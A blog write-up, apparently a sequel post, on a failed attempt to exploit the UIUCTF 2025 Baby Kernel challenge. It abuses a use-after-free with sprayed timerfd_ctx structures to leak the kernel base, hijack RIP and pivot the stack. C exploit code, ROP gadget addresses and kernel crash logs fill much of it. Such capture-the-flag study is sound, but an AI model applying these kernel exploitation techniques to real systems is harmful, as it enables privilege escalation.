This is a continuation of the Kernel Exploitation Pitfalls #1 blog, so I recommend reading that first. I’ll be using the same Baby Kernel challenge from UIUCTF 2025.
Now, I could’ve gone ahead and used the modprobe_path
technique discussed by h0mbre, with a more detailed write-up by lkmidas. It looks way simpler and more direct. But before going down that route, I wanted to try something similar to my first approach, only this time using a different structure.
While going through this great reference on kernel exploitation structs, timerfd_ctx
immediately stood out. It looked promising because we could potentially use it to control the instruction pointer (RIP), leak the kernel base address, and maybe even leak the heap.
Interestingly, there are a couple of writeups that use timerfd_ctx
for the HotRod challenge, so it’s clearly viable. But I wanted to do it unassisted. Even though it seemed straightforward at first (lol), there were some surprisingly interesting observations that came up and definitely needed documenting. And oh, we failed in this blog as well.
Approach #2
Let’s first take a look at the structure we’ll be working with.
timerfd_ctx
The timerfd_ctx
structure can be backed by either an hrtimer
or an alarm
. For this exploration, I chose to go with the hrtimer
path, since it results in the kernel eventually calling the hrtimer_restart
function after a specified interval.
This function takes a pointer to an hrtimer
as its argument, and if our assumption is correct, that should point back to the same hrtimer
inside our timerfd_ctx
. Conveniently, hrtimer
is the first field in the timerfd_ctx
struct, which means control flow will begin at the very start of our object.
That opens up an opportunity. If the kernel ends up jumping into hrtimer_restart
, and we control the timerfd_ctx
layout in memory, it could serve as a pivot into our ROP chain, effectively treating timerfd_ctx
as our fake stack.
At this point, both RDI
and R14
should point to the timerfd_ctx
, which makes it an ideal candidate for stack pivoting.
struct hrtimer {
struct timerqueue_node node;
ktime_t _softexpires;
enum hrtimer_restart (*function)(struct hrtimer *);
struct hrtimer_clock_base *base;
u8 state;
u8 is_rel;
u8 is_soft;
u8 is_hard;
};
struct timerfd_ctx {
union {
struct hrtimer tmr;
struct alarm alarm;
} t;
ktime_t tintv;
ktime_t moffs;
wait_queue_head_t wqh;
u64 ticks;
int clockid;
short unsigned expired;
short unsigned settime_flags; /* to show in fdinfo */
struct rcu_head rcu;
struct list_head clist;
spinlock_t cancel_lock;
bool might_cancel;
};
allocating a timerfd_ctx
struct
We can use the commands below to create an hrtimer
with a specified timeout.
int timerfd=0;
timerfd = timerfd_create(CLOCK_MONOTONIC, 0);
//arming the timer
struct itimerspec timer_spec = {0};
timer_spec.it_value.tv_nsec = 100000; // 100μs
// timer_spec.it_value.tv_sec = 0; // 0 seconds
timerfd_settime(timer_fd, 0, &timer_spec, NULL);
executing hrtimer_restart
function
Waiting for the specified amount of time should be enough to trigger it.
How do we exploit this?
This looks much simpler compared to the previous method.
- Allocate and free heap memory using our vulnerable driver.
- Spray
timerfd_ctx
structs into the freed heap and leak the kernel base to calculate gadget addresses. - Place a ROP gadget where
hrtimer_restart
is expected, so that it pivotsRSP
toRDI
. - Place the actual ROP chain at the start of the
timerfd_ctx
.
Exploitation
Try #1
1. Allocate and free our heap through the vulnerable driver.
int vuln_fd = open("/dev/vuln", O_RDWR);
if(ioctl(vuln_fd, ALLOC, &alloc_size) != 0) {
perror("ALLOC failed");
return -1;
}
if (ioctl(vuln_fd, FREE) != 0) {
perror("FREE failed");
return -1;
}
2. Allocate a timerfd_ctx
in our freed heap and leak base addresses.
Let’s spray a bunch of timerfd_ctx
structs to improve our chances.
char *uaf_buf = malloc(alloc_size);
printf("uaf_buf: %p\n", uaf_buf);
wait_for_enter(); // just a function waiting for me to press enter.
struct itimerspec timer_spec = {0};
timer_spec.it_value.tv_sec = 10; // 10 seconds
for (; spray_count < 1; spray_count++) {
timer_fds[spray_count] = timerfd_create(CLOCK_REALTIME, 0);
}
for(int i = 0; i < spray_count; i++) {
timerfd_settime(timer_fds[i], 0, &timer_spec, NULL);
}
// Read through our heap
if (ioctl(vuln_fd, USE_READ, uaf_buf) != 0) {
perror("USE_READ failed");
free(uaf_buf);
}
uint64_t *leak = (uint64_t*)uaf_buf;
uint64_t timerfd_tmrproc = leak[5];
base_kernel_address = timerfd_tmrproc - TIMERFD_TMRPROC_OFFSET;
printf("base_address: 0x%lx\n", base_kernel_address);
We get the following output, and the base_address
is successfully leaked. This can be confirmed using a SUID binary.
./exploit
uaf_buf: 0x22f1840
base_address: 0xffffffffaf000000
place a ROP gadget at hrtimer_restart
’s place to point RSP
to (RDI
/R14
).
First, let’s confirm whether we can control RIP
by setting it to 0xdeadbeefdeadbe00
using the following code:
leak[5] = 0xdeadbeefdeadbe00ULL;
if (ioctl(vuln_fd, USE_WRITE, uaf_buf) != 0) {
printf("USE_WRITE failed\n");
goto cleanup;
}
Output:
./exploit
uaf_buf: 0x772840
base_address: 0xffffffff8a000000
[+] Press Enter to continue
[ 2.531059] input: ImExPS/2 Generic Explorer Mouse as /devices/platform/i8042/serio1/input/input3
[ 12.511589] general protection fault: 0000 [#1] PREEMPT SMP NOPTI
[ 12.512248] CPU: 0 PID: 0 Comm: swapper/0 Tainted: G O 6.6.16 #1
[ 12.512594] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Arch Linux 1.16.3-1-1 04/01/2014
[ 12.513402] RIP: 0010:0xdeadbeefdeadbe00
[ 12.514261] Code: Unable to access opcode bytes at 0xdeadbeefdeadbdd6.
[ 12.514569] RSP: 0018:ff54d2c6c0003f28 EFLAGS: 00010082
[ 12.514889] RAX: ff2427c7c761f701 RBX: deadbeefdeadbe00 RCX: 0000000000000001
[ 12.515165] RDX: 0000000000000000 RSI: 0000000000000006 RDI: ff2427c7c1bf5800
[ 12.515430] RBP: ff2427c7c761f1c0 R08: ff2427c7c761f220 R09: 0000000000000000
[ 12.515669] R10: 0000000000000000 R11: ff54d2c6c0003ff8 R12: 0000000000000006
[ 12.515948] R13: ff2427c7c761f220 R14: ff2427c7c1bf5800 R15: ff2427c7c761f200
[ 12.516243] FS: 0000000000000000(0000) GS:ff2427c7c7600000(0000) knlGS:0000000000000000
[ 12.516524] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 12.516708] CR2: deadbeefdeadbe00 CR3: 0000000001c10000 CR4: 0000000000751ef0
[ 12.517032] PKRU: 55555554
[ 12.517227] Call Trace:
[ 12.517952] <IRQ>
[ 12.518263] ? die_addr+0x31/0x80
[ 12.518537] ? exc_general_protection+0x1af/0x3d0
[ 12.518753] ? check_preempt_curr+0x32/0x70
[ 12.518924] ? asm_exc_general_protection+0x26/0x30
[ 12.519156] ? __hrtimer_run_queues+0x10d/0x2a0
[ 12.519324] ? hrtimer_interrupt+0xf3/0x230
[ 12.519464] ? __sysvec_apic_timer_interrupt+0x4b/0x140
[ 12.519698] ? sysvec_apic_timer_interrupt+0x65/0x80
[ 12.519993] </IRQ>
[ 12.520146] <TASK>
As we can see, the kernel indeed crashes with our RIP value, which means the ROP chain can be placed at timerfd_ctx[0]
, while the stack pivot gadget can sit at timerfd_ctx[5]
.
This time, I was able to find a working stack pivot gadget:
// 0xffffffff81241107 : push rdi ; pop rsp ; xor eax, eax ; test edx, edx ; jle 0xffffffff81241114 ; jmp 0xffffffff81eafa50
// That jump leads to ret :D
Let’s test if we can successfully pivot to a ROP chain.
leak[0] = 0xdeadbeefdeadbe00ULL;
leak[5] = base_kernel_address + gadget1; // Overwrite with gadget address
if (ioctl(vuln_fd, USE_WRITE, uaf_buf) != 0) {
printf("USE_WRITE failed\n");
goto cleanup;
}
Output:
[+] Press Enter to continue
[ 2.655822] tsc: Refined TSC clocksource calibration: 3193.917 MHz
[ 2.656770] clocksource: tsc: mask: 0xffffffffffffffff max_cycles: 0x2e09d7b4b0a, max_idle_ns: 440795227609 ns
[ 2.657417] clocksource: Switched to clocksource tsc
[ 2.680992] input: ImExPS/2 Generic Explorer Mouse as /devices/platform/i8042/serio1/input/input3
[ 3.607364] kernel tried to execute NX-protected page - exploit attempt? (uid: 0)
[ 3.607849] BUG: unable to handle page fault for address: ff35f6d141c05500
[ 3.608281] #PF: supervisor instruction fetch in kernel mode
[ 3.608569] #PF: error_code(0x0011) - permissions violation
[ 3.609039] PGD 6801067 P4D 6802067 PUD 6803067 PMD 1c1f063 PTE 8000000001c05163
[ 3.609723] Oops: 0011 [#1] PREEMPT SMP NOPTI
[ 3.610151] CPU: 0 PID: 0 Comm: swapper/0 Tainted: G O 6.6.16 #1
[ 3.610453] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Arch Linux 1.16.3-1-1 04/01/2014
[ 3.610936] RIP: 0010:0xff35f6d141c05500
[ 3.611523] Code: ff ff 00 55 c0 41 d1 f6 35 ff 10 00 00 00 00 00 00 00 46 00 01 00 00 00 00 00 08 55 c0 41 d1 f6 35 ff 18 00 00 00 00 00 00 00 <00> 55 c0 41 d1 f6 35 ff 10 f7 61 47 d1 f6 35 ff 00 00 00 00 00 00
[ 3.612247] RSP: 0018:ff35f6d141c05508 EFLAGS: 00010046
[ 3.612469] RAX: 0000000000000000 RBX: ffffffff83441107 RCX: 0000000000000001
[ 3.612746] RDX: 0000000000000000 RSI: 0000000000000002 RDI: ff35f6d141c05500
[ 3.612993] RBP: ff35f6d14761f1c0 R08: ff35f6d14761f220 R09: 0000000000000000
[ 3.613258] R10: 0000000000000000 R11: ff7a6da980003ff8 R12: 0000000000000002
[ 3.613540] R13: ff35f6d14761f220 R14: ff35f6d141c05500 R15: ff35f6d14761f200
[ 3.613933] FS: 0000000000000000(0000) GS:ff35f6d147600000(0000) knlGS:0000000000000000
Interesting, instead of seeing 0xdeadbeefdeadbe00
at RIP, we get 0xff35f6d141c05500
, which matches the value of RDI
. If you debug this in GDB, you’ll notice that the value changes once the struct is allocated.
After cleaning up the code a bit and running it again, I ended up hitting the following error:
[+] Press Enter to continue
[ 4.251144] general protection fault, probably for non-canonical address 0xdeadbeefdeadbe08: 0000 [#1] PREEMPT SMP NOPTI
[ 4.251823] CPU: 0 PID: 0 Comm: swapper/0 Tainted: G O 6.6.16 #1
[ 4.252121] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Arch Linux 1.16.3-1-1 04/01/2014
[ 4.252580] RIP: 0010:rb_insert_color+0x18/0x140
[ 4.253106] Code: 1f 00 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 f3 0f 1e fa 48 8b 07 48 85 c0 0f 84 ba 00 00 00 48 8b 10 f6 c2 01 75 59 <48> 8b 4a 08 48 39 c1 74 $ 55 48 85 c9 74 05 f6 01 01 74 7c 48 8b 48
[ 4.253868] RSP: 0018:ffffffffaa003dc0 EFLAGS: 00010046
[ 4.254132] RAX: ff1ae31b01c03f00 RBX: ff1ae31b04e1f710 RCX: ff1ae31b01c03f10
[ 4.254420] RDX: deadbeefdeadbe00 RSI: ff1ae31b04e1f220 RDI: ff1ae31b04e1f710
[ 4.254695] RBP: 0000000000000000 R08: ff1ae31b04e1f220 R09: 0000000000018001
[ 4.254963] R10: 0000000000000000 R11: 0000000000000007 R12: 0000000000018001
[ 4.255255] R13: 00000001125c34c0 R14: ff1ae31b04e1f200 R15: 000000000001f1c0
[ 4.255594] FS: 0000000000000000(0000) GS:ff1ae31b04e00000(0000) knlGS:0000000000000000
[ 4.255956] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 4.256182] CR2: deadbeefdeadbe08 CR3: 0000000001c10000 CR4: 0000000000751ef0
[ 4.256516] PKRU: 55555554
[ 4.256709] Call Trace:
[ 4.257587] <TASK>
[ 4.257944] ? die_addr+0x31/0x80
[ 4.258135] ? exc_general_protection+0x1af/0x3d0
[ 4.258380] ? asm_exc_general_protection+0x26/0x30
[ 4.258616] ? rb_insert_color+0x18/0x140
[ 4.258768] timerqueue_add+0x66/0xb0
[ 4.258968] enqueue_hrtimer+0x2a/0x80
[ 4.259107] hrtimer_start_range_ns+0xf5/0x350
[ 4.259288] ? get_next_timer_interrupt+0x7a/0x110
[ 4.259442] tick_nohz_idle_stop_tick+0x233/0x2a0
[ 4.259597] ? sched_clock+0x10/0x30
[ 4.259747] do_idle+0x1d4/0x220
[ 4.259857] cpu_startup_entry+0x25/0x30
[ 4.259972] rest_init+0xc0/0xc0
[ 4.260083] arch_call_rest_init+0x9/0x30
[ 4.260294] start_kernel+0x414/0x670
[ 4.260459] x86_64_start_reservations+0x18/0x30
[ 4.260670] x86_64_start_kernel+0xc5/0xd0
[ 4.260817] secondary_startup_64_no_verify+0x178/0x17b
[ 4.261075] </TASK>
It appears the crash occurs inside the rb_insert_color
function, which is responsible for inserting a node into a red-black tree.
Let’s take a closer look at the hrtimer
structure:
struct rb_node {
unsigned long __rb_parent_color;
struct rb_node *rb_right;
struct rb_node *rb_left;
} __attribute__((aligned(sizeof(long))));
struct timerqueue_node {
struct rb_node node;
ktime_t expires;
};
struct hrtimer {
struct timerqueue_node node;
ktime_t _softexpires;
enum hrtimer_restart (*function)(struct hrtimer *);
struct hrtimer_clock_base *base;
u8 state;
u8 is_rel;
u8 is_soft;
u8 is_hard;
};
Reviewing the kernel source reveals the following:
SYSCALL_DEFINE2(timerfd_create, int, clockid, int, flags)
{
struct timerfd_ctx *ctx;
// some other stuff
ctx = kzalloc(sizeof(*ctx), GFP_KERNEL);
// some other stuff
hrtimer_init(&ctx->t.tmr, clockid, HRTIMER_MODE_ABS);
}
static void __hrtimer_init(struct hrtimer *timer, clockid_t clock_id,
enum hrtimer_mode mode)
{
timerqueue_init(&timer->node);
}
static inline void timerqueue_init(struct timerqueue_node *node)
{
RB_CLEAR_NODE(&node->node);
}
#define RB_CLEAR_NODE(node) \
((node)->__rb_parent_color = (unsigned long)(node))
We can observe that the node field is initialized to point to itself when we call timerfd_create()
. But what about rb_insert_color
?
SYSCALL_DEFINE4(timerfd_settime, int, ufd, int, flags,
const struct __kernel_itimerspec __user *, utmr,
struct __kernel_itimerspec __user *, otmr)
{
ret = do_timerfd_settime(ufd, flags, &new, &old);
}
static int do_timerfd_settime(int ufd, int flags,
const struct itimerspec64 *new,
struct itimerspec64 *old)
{
struct timerfd_ctx *ctx;
ret = timerfd_setup(ctx, flags, new);
}
static int timerfd_setup(struct timerfd_ctx *ctx, int flags,
const struct itimerspec64 *ktmr)
{
//somewhere
hrtimer_start(&ctx->t.tmr, texp, htmode);
}
static inline void hrtimer_start(struct hrtimer *timer, ktime_t tim,
const enum hrtimer_mode mode)
{
hrtimer_start_range_ns(timer, tim, 0, mode);
}
static int __hrtimer_start_range_ns(struct hrtimer *timer, ktime_t tim,
u64 delta_ns, const enum hrtimer_mode mode,
struct hrtimer_clock_base *base)
{
// lot of stuff
first = enqueue_hrtimer(timer, new_base, mode);
// lot of stuff
}
static int enqueue_hrtimer(struct hrtimer *timer,
struct hrtimer_clock_base *base,
enum hrtimer_mode mode)
{
return timerqueue_add(&base->active, &timer->node);
}
/**
* timerqueue_add - Adds timer to timerqueue.
*
* @head: head of timerqueue
* @node: timer node to be added
*
* Adds the timer node to the timerqueue, sorted by the node's expires
* value. Returns true if the newly added timer is the first expiring timer in
* the queue.
*/
bool timerqueue_add(struct timerqueue_head *head, struct timerqueue_node *node)
{
/* Make sure we don't add nodes that are already added */
WARN_ON_ONCE(!RB_EMPTY_NODE(&node->node));
return rb_add_cached(&node->node, &head->rb_root, __timerqueue_less);
}
/**
* rb_add_cached() - insert @node into the leftmost cached tree @tree
* @node: node to insert
* @tree: leftmost cached tree to insert @node into
* @less: operator defining the (partial) node order
*
* Returns @node when it is the new leftmost, or NULL.
*/
static __always_inline struct rb_node *
rb_add_cached(struct rb_node *node, struct rb_root_cached *tree,
bool (*less)(struct rb_node *, const struct rb_node *))
{
struct rb_node **link = &tree->rb_root.rb_node;
struct rb_node *parent = NULL;
bool leftmost = true;
while (*link) {
parent = *link;
if (less(node, parent)) {
link = &parent->rb_left;
} else {
link = &parent->rb_right;
leftmost = false;
}
}
rb_link_node(node, parent, link);
rb_insert_color_cached(node, tree, leftmost);
return leftmost ? node : NULL;
}
static inline void rb_insert_color_cached(struct rb_node *node,
struct rb_root_cached *root,
bool leftmost)
{
if (leftmost)
root->rb_leftmost = node;
rb_insert_color(node, &root->rb_root);
}
While diving deeper into this may not yield direct value for exploitation, it’s clear that the kernel uses red-black trees to manage timers. Specifically, the first 8 bytes of timerfd_ctx
are overwritten as part of this setup, pointing to the same structure. This modification is triggered internally when a timer is armed using timerfd_settime()
.
Try #2
Now that the modification is known to occur after a short delay, we can introduce a brief pause before overwriting timerfd_ctx[0]
, with the goal of racing the kernel’s logic and gaining control over the structure in time.
usleep(20); // 100μs
if (ioctl(vuln_fd, USE_WRITE, uaf_buf) != 0) {
printf("USE_WRITE failed\n");
goto cleanup;
}
Output:
[+] Press Enter to continue
[ 2.592776] input: ImExPS/2 Generic Explorer Mouse as /devices/platform/i8042/serio1/input/input3
[ 2.976739] general protection fault, probably for non-canonical address 0xf608c383480b8b58: 0000 [#1] PREEMPT SMP NOPTI
[ 2.977266] CPU: 0 PID: 0 Comm: swapper/0 Tainted: G O 6.6.16 #1
[ 2.977491] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Arch Linux 1.16.3-1-1 04/01/2014
[ 2.977819] RIP: 0010:rb_next+0x18/0x50
[ 2.978216] Code: 00 00 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 f3 0f 1e fa 48 8b 0f 48 39 cf 74 33 48 8b 57 08 48 85 d2 74 1d 48 89 d0 <48> 8b 52 10 48 85 d2 75 f4 c3 cc cc cc cc 48 3b 78 08 75 15$ 48 8b
[ 2.978730] RSP: 0018:ff6627f000003f10 EFLAGS: 00010086
[ 2.978881] RAX: f608c383480b8b48 RBX: ff13089641987128 RCX: 0000000000000001
[ 2.979044] RDX: f608c383480b8b48 RSI: ff13089641987128 RDI: ff13089641987128
[ 2.979224] RBP: ff1308964761f220 R08: 0000000000000004 R09: 0000000000000000
[ 2.979392] R10: 0000000000000000 R11: ff6627f000003ff8 R12: 0000000000000006
[ 2.979579] R13: ff1308964761f220 R14: ff13089641987128 R15: ff1308964761f200
[ 2.979767] FS: 0000000000000000(0000) GS:ff13089647600000(0000) knlGS:0000000000000000
[ 2.979966] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 2.980109] CR2: f608c383480b8b58 CR3: 0000000001c10000 CR4: 0000000000751ef0
[ 2.980321] PKRU: 55555554
[ 2.980465] Call Trace:
[ 2.981147] <IRQ>
[ 2.981390] ? die_addr+0x31/0x80
[ 2.981515] ? exc_general_protection+0x1af/0x3d0
[ 2.981630] ? asm_exc_general_protection+0x26/0x30
[ 2.981765] ? rb_next+0x18/0x50
[ 2.981850] timerqueue_del+0x1f/0x50
[ 2.981984] __hrtimer_run_queues+0xdf/0x2a0
[ 2.982105] hrtimer_interrupt+0xf3/0x230
[ 2.982219] __sysvec_apic_timer_interrupt+0x4b/0x140
[ 2.982339] sysvec_apic_timer_interrupt+0x65/0x80
[ 2.982561] </IRQ>
[ 2.982624] <TASK>
[ 2.982671] asm_sysvec_apic_timer_interrupt+0x1a/0x20
[ 2.982897] RIP: 0010:default_idle+0xf/0x20
Now, rb_next()
gets called, probably one of the other functions trying to keep the red-black tree up to date, and there could be more.
Try #3
We can try to rewrite the heap just before the timer is about to expire so that no functions running in the middle are interrupted. We get the following output:
./exploit
uaf_buf: 0x688840
base_address: 0xffffffff81800000
[ 2.531285] BUG: kernel NULL pointer dereference, address: 0000000000000000
[ 2.531656] #PF: supervisor write access in kernel mode
[ 2.531821] #PF: error_code(0x0002) - not-present page
[ 2.531982] PGD 1c02067 P4D 1c18067 PUD 1c2b067 PMD 0
[ 2.532274] Oops: 0002 [#1] PREEMPT SMP NOPTI
[ 2.532515] CPU: 0 PID: 0 Comm: swapper/0 Tainted: G O 6.6.16 #1
[ 2.533046] RIP: 0010:rb_erase+0x18b/0x3a0
[ 2.533398] Code: 48 83 c0 01 48 89 01 c3 cc cc cc cc c3 cc cc cc cc 48 89 46 10 e9 17 ff ff ff 48 8b 56 10 48 8d 41 01 48 89 51 08 48 89 4e 10 <48> 89 02 48 8b 01 48 89 06 48 89 31 48 83 f8 03 0$ f 86 96 00 00 00
[ 2.533843] RSP: 0018:ff48cf3480003f10 EFLAGS: 00010046
[ 2.533986] RAX: ff1fe4150198b129 RBX: ff1fe4150761f710 RCX: ff1fe4150198b128
[ 2.534140] RDX: 0000000000000000 RSI: ff1fe41501c06500 RDI: ff1fe4150761f710
[ 2.534307] RBP: ff1fe4150761f220 R08: ff1fe4150761f220 R09: ff1fe41501bb9790
[ 2.534479] R10: ff1fe4150762b580 R11: ff48cf3480003ff8 R12: 0000000000000002
[ 2.534649] R13: ff1fe4150761f220 R14: ff1fe4150761f710 R15: ff1fe4150761f200
[ 2.534964] FS: 0000000000000000(0000) GS:ff1fe41507600000(0000) knlGS:0000000000000000
[ 2.535235] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 2.535412] CR2: 0000000000000000 CR3: 0000000001c12000 CR4: 0000000000751ef0
[ 2.535663] PKRU: 55555554
[ 2.535804] Call Trace:
[ 2.536553] <IRQ>
[ 2.536884] ? __die+0x1e/0x60
[ 2.537021] ? page_fault_oops+0x17c/0x470
[ 2.537131] ? exc_page_fault+0x6b/0x150
[ 2.537278] ? asm_exc_page_fault+0x26/0x30
[ 2.537437] ? rb_erase+0x18b/0x3a0
[ 2.537543] timerqueue_del+0x2e/0x50
[ 2.537695] __hrtimer_run_queues+0xdf/0x2a0
[ 2.537826] hrtimer_interrupt+0xf3/0x230
[ 2.537947] __sysvec_apic_timer_interrupt+0x4b/0x140
[ 2.538082] sysvec_apic_timer_interrupt+0x65/0x80
[ 2.538290] </IRQ>
[ 2.538350] <TASK>
Digging deep again, I came across this:
static void __run_hrtimer(struct hrtimer_cpu_base *cpu_base,
struct hrtimer_clock_base *base,
struct hrtimer *timer, ktime_t *now,
unsigned long flags) __must_hold(&cpu_base->lock)
{
enum hrtimer_restart (*fn)(struct hrtimer *);
// between bazillion other stuff
__remove_hrtimer(timer, base, HRTIMER_STATE_INACTIVE, 0);
fn = timer->function;
restart = fn(timer);
}
static void __remove_hrtimer(struct hrtimer *timer,
struct hrtimer_clock_base *base,
u8 newstate, int reprogram)
{
// between bazillion other stuff
if (!timerqueue_del(&base->active, &timer->node)) {
// does something
}
}
bool timerqueue_del(struct timerqueue_head *head, struct timerqueue_node *node)
{
WARN_ON_ONCE(RB_EMPTY_NODE(&node->node));
rb_erase_cached(&node->node, &head->rb_root);
return !RB_EMPTY_ROOT(&head->rb_root.rb_root);
}
static inline struct rb_node *
rb_erase_cached(struct rb_node *node, struct rb_root_cached *root)
{
//other stuff
rb_erase(node, &root->rb_root);
}
The function that is responsible for calling the hrtimer_restart
function first calls the function that ends up calling rb_erase
.
At this point, there are several approaches that I could think about:
Find a Return-Oriented Programming (ROP) gadget that pivots
RSP
totimerfd_ctx + some_offset
.Race conditions? Somehow change
timerfd_ctx[0]
just afterrb_erase
has returned andhrtimer_restart
has to be called?
I do not yet understand race conditions enough in this context to even know if it’s possible. At this point, I went through D3vil’s writeup for HotRod. Interestingly, he sets timerfd_ctx[0]
to &timerfd_ctx[0] + some_offset
and then sets the value stored at RDI
to ESP
, and that doesn’t seem to crash the kernel. Keep in mind that Supervisor Mode Access Prevention (SMAP) is disabled in that challenge, so 32 bits was enough in that case. The writeup also goes over the usage of userfaultfd
for exploiting race conditions reliably, but it seems to have been deprecated and we need to look into Filesystem in Userspace
(FUSE) for it. Maybe something I can have a look at next.
This means that the timer
argument passed to __run_hrtimer
below is taken from timerfd_ctx[0]
.
static void __hrtimer_run_queues(struct hrtimer_cpu_base *cpu_base, ktime_t now,
unsigned long flags, unsigned int active_mask)
{
struct hrtimer_clock_base *base;
unsigned int active = cpu_base->active_bases & active_mask;
for_each_active_base(base, cpu_base, active) {
struct timerqueue_node *node;
ktime_t basenow;
basenow = ktime_add(now, base->offset);
while ((node = timerqueue_getnext(&base->active))) {
struct hrtimer *timer;
timer = container_of(node, struct hrtimer, node);
/*
* The immediate goal for using the softexpires is
* minimizing wakeups, not running timers at the
* earliest interrupt after their soft expiration.
* This allows us to avoid using a Priority Search
* Tree, which can answer a stabbing query for
* overlapping intervals and instead use the simple
* BST we already have.
* We don't add extra wakeups by delaying timers that
* are right-of a not yet expired timer, because that
* timer will have to trigger a wakeup anyway.
*/
if (basenow < hrtimer_get_softexpires_tv64(timer))
break;
__run_hrtimer(cpu_base, base, timer, &basenow, flags);
if (active_mask == HRTIMER_ACTIVE_SOFT)
hrtimer_sync_wait_running(cpu_base, flags);
}
}
}
Try #4
Well, we can try to see in the source code if that’s what happens, but (skill issue) we can test this. Let’s set timerfd_ctx[0]
to &timerfd_ctx[0]+100
. This should give us a page fault for trying to execute &timerfd_ctx[0]+100
at RIP
with our current ROP gadget.
./exploit
uaf_buf: 0x19cd840
base_address: 0xffffffff9bc00000
timerfd_tmrproc: 0xffffffff9bee6a20
gadget1: 0xffffffff9be41107
previous_buf: 0x1
[ 2.558530] input: ImExPS/2 Generic Explorer Mouse as /devices/platform/i8042/serio1/input/input3
[ 2.560838] BUG: kernel NULL pointer dereference, address: 0000000000000074
[ 2.561136] #PF: supervisor read access in kernel mode
[ 2.561279] #PF: error_code(0x0000) - not-present page
[ 2.561463] PGD 1c04067 P4D 1bfd067 PUD 1c18067 PMD 0
[ 2.562034] CPU: 0 PID: 65 Comm: exploit Tainted: G O 6.6.16 #1
[ 2.562239] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Arch Linux 1.16.3-1-1 04/01/2014
[ 2.562550] RIP: 0010:rb_erase+0x84/0x3a0
[ 2.562947] Code: 89 16 48 8b 57 10 48 89 50 10 48 8b 32 83 e6 01 4c 01 d6 48 89 32 48 8b 17 48 83 fa 03 0f 86 82 00 00 00 48 89 d6 48 83 e6 fc <48> 3b 7e 10 0f 84 e4 00 00 00 48 89 $ 46 08 4d 85 c9 74 0f 48 83 c1
[ 2.563416] RSP: 0018:ff623b9d00003f10 EFLAGS: 00010002
[ 2.563559] RAX: ff17ea7401987128 RBX: ff17ea7401bf4d00 RCX: ff17ea7401987128
[ 2.563795] RDX: 0000000000000065 RSI: 0000000000000064 RDI: ff17ea7401bf4d00
[ 2.563975] RBP: ff17ea740761f220 R08: ff17ea740761f220 R09: 0000000000000000
[ 2.564142] R10: ff17ea7401987128 R11: ff623b9d00003ff8 R12: 0000000000000006
[ 2.564308] R13: ff17ea740761f220 R14: ff17ea7401bf4d00 R15: ff17ea740761f200
[ 2.564524] FS: 00000000019cc3c0(0000) GS:ff17ea7407600000(0000) knlGS:0000000000000000
[ 2.564799] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 2.564986] CR2: 0000000000000074 CR3: 0000000001c10000 CR4: 0000000000751ef0
[ 2.565247] PKRU: 55555554
[ 2.565386] Call Trace:
[ 2.566143] <IRQ>
[ 2.566406] ? __die+0x1e/0x60
[ 2.566549] ? page_fault_oops+0x17c/0x470
[ 2.566697] ? exc_page_fault+0x6b/0x150
[ 2.566782] ? asm_exc_page_fault+0x26/0x30
[ 2.566895] ? rb_erase+0x84/0x3a0
[ 2.566989] timerqueue_del+0x2e/0x50
[ 2.567120] __hrtimer_run_queues+0xdf/0x2a0
This does not seem to happen, but interestingly we do get a page fault which the userfaultfd
, so does it end up handling in this situation as well? I have really no clue currently and need to dig further.
I still tried to do something different, just to replicate it like the above writeup. Get the leak from the first timer, deallocate it by using close(timer_fd)
, then try to get another timerfd_ctx
allocated. But no matter how hard I tried, the second timerfd_ctx
never got allocated into my freed heap with the below code, leading to 0xdeadbeefdeadbe00
never being called.
int vuln_fd = open("/dev/vuln", O_RDWR);
char *uaf_buf = malloc(alloc_size); //assume not failed
char *uaf_buf2 = malloc(alloc_size);//assume not failed
memset(uaf_buf2, 0, alloc_size);
struct itimerspec timer_spec = {{0, 0}, {10, 0}};
int timer_fd, timer_fds[20];
int spray_count = 0;
if(ioctl(vuln_fd, ALLOC, &alloc_size) != 0) {
//assume not failed to reduce text
}
if (ioctl(vuln_fd, FREE) != 0) {
//assume not failed to reduce text
}
//allocation 1
timer_fd = timerfd_create(CLOCK_REALTIME, 0);
timerfd_settime(timer_fd, 0, &timer_spec, 0);
close(timer_fd);
sleep(1);
if (ioctl(vuln_fd, USE_READ, uaf_buf) != 0) {
perror("USE_READ failed");
free(uaf_buf);
}
// allocation 2
for (; spray_count < 20; spray_count++) {
timer_fds[spray_count] = timerfd_create(CLOCK_REALTIME, 0);
}
for(int i = 0; i < spray_count; i++) {
timerfd_settime(timer_fds[i], 0, &timer_spec, NULL);
}
sleep(1);
uint64_t *leak = (uint64_t*)uaf_buf;
uint64_t timerfd_tmrproc = leak[5];
base_kernel_address = timerfd_tmrproc - TIMERFD_TMRPROC_OFFSET;
leak[5] = 0xdeadbeefdeadbe00; // Overwrite with gadget address
if (ioctl(vuln_fd, USE_WRITE, uaf_buf) != 0) {
printf("USE_WRITE failed\n");
goto cleanup;
}
wait_for_enter();
However, if you go over Will’s Root’s HotRod writeup, he uses xchg_eax_esp
for a stack pivot, something I really did not understand. Where and how is he controlling $eax
?
Looking at the register values when our target function is called, $rax
seems to possibly hold a pointer to the heap but where????
Breakpoint 2, 0xffffffff88e41107 in ?? ()
(gdb) i r
rax 0xff19fc968761f701 -64742996173523199
rbx 0xffffffff88e41107 -1998319353
rcx 0x1 1
rdx 0x0 0
rsi 0x2 2
rdi 0xff19fc9681c02900 -64742996268013312
rbp 0xff19fc968761f1c0 0xff19fc968761f1c0
rsp 0xff4ea116c0003f28 0xff4ea116c0003f28
r8 0xff19fc968761f220 -64742996173524448
r9 0x0 0
r10 0x0 0
r11 0xff4ea116c0003ff8 -49925426771902472
r12 0x2 2
r13 0xff19fc968761f220 -64742996173524448
r14 0xff19fc9681c02900 -64742996268013312
r15 0xff19fc968761f200 -64742996173524480
rip 0xffffffff88e41107 0xffffffff88e41107
eflags 0x82 [ IOPL=0 SF ]
There the pivot_target
in user space is set to:
